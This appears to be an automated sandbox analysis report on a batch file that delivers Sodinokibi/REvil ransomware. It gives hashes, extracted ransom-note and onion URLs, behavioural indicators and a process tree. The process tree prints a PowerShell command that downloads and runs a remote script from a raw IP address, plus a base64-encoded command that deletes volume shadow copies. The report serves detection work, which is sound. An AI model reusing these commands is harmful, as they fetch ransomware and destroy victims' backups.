Analysis
-
max time kernel
51s -
max time network
62s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
26-07-2020 15:10
Static task
static1
Behavioral task
behavioral1
Sample
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
Resource
win7v200722
Behavioral task
behavioral2
Sample
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
Resource
win10
General
-
Target
4eb6ba5ba6c21ac7744e462c7de7df9a.bat
-
Size
213B
-
MD5
c706ae9c80ccdfa7c936b7c8df7cfa76
-
SHA1
5ec96eaf49a1004e20f9be597ef6c78b7bf69e55
-
SHA256
b3a094f34f9fb134e07a2e0b414bcbf01c2097dd4b14f98127ecdeb46343d4cc
-
SHA512
6299207c06345ea343eadff3fb433da135526d9410b863388597cf41c8fb91313a78509c7c69aae221f083a90cc6347a1d31642bbdfc3ac7c8dc5a5188d01ff6
Malware Config
Extracted
http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a
Extracted
C:\4nl5390x43-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5A83B5160AE50FC5
http://decryptor.cc/5A83B5160AE50FC5
Signatures
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1080 wrote to memory of 1408 1080 cmd.exe powershell.exe PID 1080 wrote to memory of 1408 1080 cmd.exe powershell.exe PID 1080 wrote to memory of 1408 1080 cmd.exe powershell.exe PID 1080 wrote to memory of 1408 1080 cmd.exe powershell.exe PID 1408 wrote to memory of 1072 1408 powershell.exe powershell.exe PID 1408 wrote to memory of 1072 1408 powershell.exe powershell.exe PID 1408 wrote to memory of 1072 1408 powershell.exe powershell.exe PID 1408 wrote to memory of 1072 1408 powershell.exe powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 25 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\4nl5390x43-readme.txt powershell.exe File opened for modification \??\c:\program files\BlockExpand.dxf powershell.exe File opened for modification \??\c:\program files\DenyUndo.bmp powershell.exe File opened for modification \??\c:\program files\FindEnter.xml powershell.exe File opened for modification \??\c:\program files\ReadWait.i64 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4nl5390x43-readme.txt powershell.exe File opened for modification \??\c:\program files\UnregisterSubmit.potx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\4nl5390x43-readme.txt powershell.exe File opened for modification \??\c:\program files\RemoveUnprotect.aif powershell.exe File opened for modification \??\c:\program files\SendCopy.xlt powershell.exe File opened for modification \??\c:\program files\SendDisconnect.eps powershell.exe File opened for modification \??\c:\program files\SubmitWrite.wma powershell.exe File opened for modification \??\c:\program files\TestFormat.bmp powershell.exe File opened for modification \??\c:\program files\UnregisterDisable.3g2 powershell.exe File opened for modification \??\c:\program files\CompleteSelect.xlsb powershell.exe File opened for modification \??\c:\program files\DismountAssert.snd powershell.exe File opened for modification \??\c:\program files\FormatMount.m4a powershell.exe File opened for modification \??\c:\program files\OptimizeDisconnect.wmf powershell.exe File opened for modification \??\c:\program files\ResetConvertTo.ex_ powershell.exe File opened for modification \??\c:\program files\UnregisterPing.mpeg3 powershell.exe File created \??\c:\program files (x86)\4nl5390x43-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromPublish.fon powershell.exe File opened for modification \??\c:\program files\SaveRename.vstx powershell.exe File opened for modification \??\c:\program files\SuspendConvertFrom.wmf powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\4nl5390x43-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\91txmrvnxdk8l.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 1408 powershell.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeBackupPrivilege 1872 vssvc.exe Token: SeRestorePrivilege 1872 vssvc.exe Token: SeAuditPrivilege 1872 vssvc.exe Token: SeTakeOwnershipPrivilege 1408 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1408 powershell.exe 1408 powershell.exe 1408 powershell.exe 1072 powershell.exe 1072 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1408 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\SplitShow.crw => \??\c:\users\admin\pictures\SplitShow.crw.4nl5390x43 powershell.exe File renamed C:\Users\Admin\Pictures\UnblockSelect.crw => \??\c:\users\admin\pictures\UnblockSelect.crw.4nl5390x43 powershell.exe File renamed C:\Users\Admin\Pictures\ExpandUpdate.raw => \??\c:\users\admin\pictures\ExpandUpdate.raw.4nl5390x43 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4eb6ba5ba6c21ac7744e462c7de7df9a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4eb6ba5ba6c21ac7744e462c7de7df9a');Invoke-BUSJHY;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Modifies extensions of user files
PID:1408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1872